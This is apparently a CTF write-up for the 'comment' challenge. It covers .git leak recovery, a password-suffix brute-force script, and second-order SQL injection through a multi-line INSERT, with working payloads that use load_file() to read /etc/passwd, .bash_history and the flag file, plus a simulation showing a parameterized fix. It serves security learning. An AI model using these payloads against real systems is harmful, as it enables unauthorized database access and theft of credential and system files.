Attack and Defense World (攻防世界): comment

  • The challenge opens on a message board page. Posting requires a login, and without one you are sent back to the login page.
  • Before anything else, scan it with dirsearch to see which files are exposed.
  • Nice: the scan turns up an exposed .git directory. It also finds mysql.php, but visiting it directly returns nothing useful; more on that later.
  • Dumping the repository with GitHack only recovers write_do.php.
  • Recovered source:
<?php
include "mysql.php";
session_start();
// only logged-in users reach the handlers below
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    // body missing: GitHack recovered only a truncated copy of this file
    break;
case 'comment':
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>
  • So $_SESSION['login'] must equal 'yes' before any of this code runs.
  • The login page itself drops a hint:
  • Account: zhangwei  Password: zhangwei***
  • Only the last three characters of the password are unknown, so it can be brute-forced.
  • A script to enumerate every three-character combination of digits and lowercase letters:
import string
from itertools import product

# all 36^3 candidate suffixes for zhangwei***: digits 0-9 plus a-z
chars = string.digits + string.ascii_lowercase
for a, b, c in product(chars, repeat=3):
    print(a + b + c)
  • The password turns out to be zhangwei666.
  • After logging in, the SQL injection hinted at by the challenge name should be somewhere on this page; my guess was a second-order injection.
  • Create a post first, then read the value back.
  • I could not work out on my own whether it really was second-order injection, so I looked at a write-up.
  • It turned out my GitHack dump of write_do.php was incomplete; here is the complete source from that write-up:
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    // first INSERT: every field is escaped with addslashes() before concatenation,
    // but MySQL removes the escaping when it parses the literal, so the raw text is stored
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    // second-order source: the stored category is read back with no escaping...
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    // ...and concatenated straight into a second INSERT
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>
————————————————
// Copyright notice: this article is the original work of CSDN blogger "HyyMbb", licensed under CC 4.0 BY-SA; reproduction must include the original source link and this notice.
// Original link: https://blog.csdn.net/a3320315/article/details/104216070
  • The key to this challenge is the category field submitted in the write branch and the content field submitted in the comment branch.
  • In the comment branch, category is read back out of the board table and concatenated into the second INSERT with no escaping at all.
  • On write, category does go through addslashes(), but that only protects the first INSERT: MySQL strips the escaping backslashes when it parses the quoted literal, so the stored value is exactly what we typed, single quote included. That is the second-order (stored) injection.
  • The most awkward part of the challenge is this statement:
$content = addslashes($_POST['content']);
$sql = "insert into comment
        set category = '$category',
            content = '$content',
            bo_id = '$bo_id'";
  • Because the INSERT is spread over several lines, ending the payload with # does not work: # only comments out the rest of its own line, and the content = ... and bo_id = ... lines that follow would still be parsed and break the statement. Instead, open a /* block comment at the end of the category payload and close it with */ from the content field of the comment.
  • For example, when creating the post:

TITLE: database
CATEGORY: 123',content=database(),/*
CONTENT: 123

and then, in the comment box of that post, submit:

*/#

  • The comment INSERT then becomes

insert into comment
            set category = '123',content=database(),/*',
                content = '*/#',
                bo_id = '$bo_id'

which, once MySQL discards the comment, inserts a row with category '123' and content set to the result of database().
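To make the two code paths tangible, here is an added Python simulation (not code from the write-up, and not the challenge's own PHP) that re-implements addslashes(), the way MySQL un-escapes a quoted literal when storing it, and the two string-built INSERT statements, then strips MySQL comments to show the statement the server actually parses. It demonstrates why a trailing # does not survive the multi-line INSERT while the /* ... */ split across the two fields does, and contrasts a parameterized INSERT in which the same payload stays plain data. No MySQL server is involved; sqlite3 stands in for MySQL in the hardened function (an assumption of the example), and the bo_id value '1' and the comment strings are constructed sample inputs.

```python
import re
import sqlite3

# Added example, not code from the original write-up or the challenge.
# It mirrors write_do.php in Python so the effective SQL can be inspected offline.


def addslashes(s: str) -> str:
    """PHP addslashes(): backslash-escape single quote, double quote, backslash, NUL."""
    return (s.replace("\\", "\\\\")
             .replace("'", "\\'")
             .replace('"', '\\"')
             .replace("\0", "\\0"))


def mysql_stored_value(escaped: str) -> str:
    """What MySQL keeps after parsing a '...'-quoted literal: the escaping
    backslashes are consumed, so the attacker's quotes come back verbatim."""
    unescape = {"\\": "\\", "'": "'", '"': '"', "0": "\0"}
    return re.sub(r"\\(.)", lambda m: unescape.get(m.group(1), m.group(1)), escaped)


def write_sql(category: str, title: str, content: str) -> str:
    """case 'write': every field is escaped before concatenation (first-order safe)."""
    return ("insert into board\n"
            f"            set category = '{addslashes(category)}',\n"
            f"                title = '{addslashes(title)}',\n"
            f"                content = '{addslashes(content)}'")


def comment_sql(stored_category: str, content: str, bo_id: str) -> str:
    """case 'comment': category comes back from the board table and is used raw."""
    return ("insert into comment\n"
            f"            set category = '{stored_category}',\n"
            f"                content = '{addslashes(content)}',\n"
            f"                bo_id = '{addslashes(bo_id)}'")


def strip_comments(sql: str) -> str:
    """Drop MySQL /* ... */ block comments and # line comments and collapse
    whitespace, to show what the parser sees. Simplified: it does not track
    quoted strings, which is sufficient for the payloads in this write-up."""
    sql = re.sub(r"/\*.*?\*/", "", sql, flags=re.S)
    sql = re.sub(r"#[^\n]*", "", sql)
    return re.sub(r"\s+", " ", sql).strip()


def category_payload(expr: str) -> str:
    """Category value in the write-up's shape, for an arbitrary SQL expression."""
    return f"123',content=({expr}),/*"


def effective_comment_sql(category: str, comment_content: str, bo_id: str = "1") -> str:
    """Full chain: escaped on write, un-escaped by MySQL on store, reused raw on comment."""
    stored = mysql_stored_value(addslashes(category))      # equals the raw category
    return strip_comments(comment_sql(stored, comment_content, bo_id))


def safe_comment_insert(stored_category: str, content: str, bo_id: str):
    """Hardened form: a parameterized INSERT, so the stored category is data, not SQL.
    sqlite3 stands in for MySQL here (assumption of the example); returns the stored row."""
    db = sqlite3.connect(":memory:")
    db.execute("create table comment(category text, content text, bo_id text)")
    db.execute("insert into comment(category, content, bo_id) values (?, ?, ?)",
               (stored_category, content, bo_id))
    return db.execute("select category, content, bo_id from comment").fetchone()


if __name__ == "__main__":
    # Trailing '#' only: the following lines of the INSERT survive and the statement breaks.
    print(effective_comment_sql("123',content=database()#", "anything"))
    # '/*' in category, '*/#' in the comment: the statement is valid and content=database().
    print(effective_comment_sql("123',content=database(),/*", "*/#"))
    # Parameterized: the payload is stored literally and never reaches the parser as SQL.
    print(safe_comment_insert(category_payload("database()"), "*/#", "1"))
```

Run it with python3 to see the three results side by side: the #-only variant leaves `database() content = 'anything'` in the statement (a syntax error in MySQL), the /* ... */ variant reduces to `set category = '123',content=database(), bo_id = '1'`, and the parameterized insert returns the payload unchanged as a stored string.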
  • The comment page then displays the result.
  • Next payload: 123',content=(select group_concat(table_name) from information_schema.tables where table_schema=database()),/*
  • which returns board,comment,user.
  • I went through all the tables and did not find the flag...
  • So I switched to reading files with load_file():
  • 123',content=(select (load_file('/etc/passwd'))),/*
insert into comment
            set category = '123',content=(select (load_file('/etc/passwd'))),/*',
                content = '*/#',
                bo_id = '$bo_id'
  • The file contents come back in the comment, so load_file() works.
  • Then the web user's shell history: 123',content=(select (load_file('/home/www/.bash_history'))),/*
  • and the .DS_Store under /tmp/html, hex-encoded because it is a binary file: 123', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
  • Decoding the hex reveals the filename flag_8946e1ff1ee3e40f.php.
  • 123',content=(select (load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*
  • The flag is in the page source (open the developer tools with F12).
  • An afternoon of manual injection!

Origin blog.csdn.net/CyhDl666/article/details/114126180